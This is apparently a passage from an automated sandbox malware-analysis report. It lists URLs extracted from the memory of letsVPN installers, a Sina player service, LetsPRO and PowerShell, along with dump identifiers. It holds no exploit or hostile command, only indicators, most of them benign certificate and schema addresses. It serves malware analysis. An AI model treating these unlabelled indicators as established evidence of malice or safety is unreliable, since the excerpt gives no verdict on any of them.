00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
              Source: powershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: sinaplayer_service.exeString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktop
              Source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=
              Source: sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=htt
              Source: sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktopcrash_checkpoint.txtmax-reportsno-windowreporterdumps
              Source: letsvpn-latest.exe, 00000013.00000003.2329176650.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://schemas.fontawesome.io/icons/
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/claims/EmailAddressNhttp://schemas.xmlsoap.org/claims/GroupJhttp://schema
              Source: powershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressingzhttp://docs.oasis-open.org/ws-sx/ws-secureconversat
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/mex
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/transfer/Getthttp://schemas.xmlsoap.org/ws/2004/09/transfer/Ge
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scXhttp://schemas.xmlsoap.org/ws/2005/02/sc/sct
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/CancelT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuelhttp://schemas.xmlsoap.org/ws/2005/02/trust/RS
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/RenewT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/ValidateT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancel
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/CancelT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancelmhttp://schemas.xmlsoap.org/ws/2005/02/trust/
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Renew
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/RenewT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTwhttp://schemas.xmlsoap.org/ws/2005/02/trust/RST
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validate
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/ValidateT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validateehttp://schemas.xmlsoap.org/ws/2005/02/trus
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validateq
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/ws-trust.xsd
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/attributename
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/displayname
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/format
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/namequalifier
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/spnamequalifier
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/spprovidedid
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/country
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirth
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsshttp://schemas.xmlsoap.org/ws/2005/05/iden
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/gender
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/homephone
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2664706128.0000000004951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcode
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifier
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifierrhttp://schemas.xmlso
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/sid
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddress#StreetAddressText
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprint
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/urishttp://schemas.xmlsoap.org/ws/2005/05/iden
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/webpage
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname_urn:oasis:names:tc:xacml
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2007/01/identity
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2009/09/identity/claims/actor
              Source: powershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
              Source: letsVPN.exe, 00000000.00000002.2227641461.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2037454903.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://web.singnet.com.sg/~rendsoft
              Source: letsvpn-latest.exe, 00000013.00000003.2507016219.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://wpfanimatedgif.codeplex.com
              Source: powershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: letsVPN.exe, 00000000.00000002.2227641461.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2037454903.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.atomixbuttons.com
              Source: letsVPN.exe, 00000000.00000002.2227641461.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2037454903.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.atomixbuttons.com/textcalc
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: letsvpn-latest.exe, 00000013.00000003.2329768871.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hardcodet.net/taskbar
              Source: sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
              Source: sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.winimage.com/zLibDll-1.2.5U(L
              Source: sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.winimage.com/zLibDllnetwork_change
              Source: letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xmlspy.com)
              Source: letsvpn-latest.exe, 00000013.00000003.2827115920.0000000000563000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2212864980.000000000283E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1wm27s.onelink.me/DPiD/s5eizipo-1
              Source: letsvpn-latest.exe, 00000013.00000003.2827115920.0000000000563000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2212864980.000000000283E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1wm27s.onelink.me/DPiD/zpbo7ig1https://1wm27s.onelink.me/DPiD/s5eizipoopen
              Source: letsvpn-latest.exe, 00000013.00000003.2827115920.0000000000563000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2212864980.000000000283E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1wm27s.onelink.me/DPiD/zpbo7ig1open
              Source: powershell.exe, 00000018.00000002.2664706128.0000000004951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
              Source: letsvpn-latest.exe, 00000013.00000003.2415149418.0000000002838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/systemdrawingnonwindows
              Source: letsvpn-latest.exe, 00000013.00000003.2326201013.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3922925338.0000000005F32000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://aka.ms/toolkit/dotnet
              Source: letsvpn-latest.exe, 00000013.00000003.2324359693.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2385529733.0000000002833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/#
              Source: powershell.exe, 00000018.00000002.2667384092.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000018.00000002.2667384092.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000018.00000002.2667384092.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
